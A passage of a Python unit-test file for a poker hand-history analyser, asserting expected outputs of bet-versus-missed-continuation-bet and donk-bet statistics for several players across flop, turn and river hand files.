strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('call', tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('fold', tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
def test_b_vs_mcb_raise_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_enum_b_vs_mcb_raise_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
class TestDonkBet(unittest.TestCase):
def test_db_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in0gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XXBFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XBCRFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_db(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
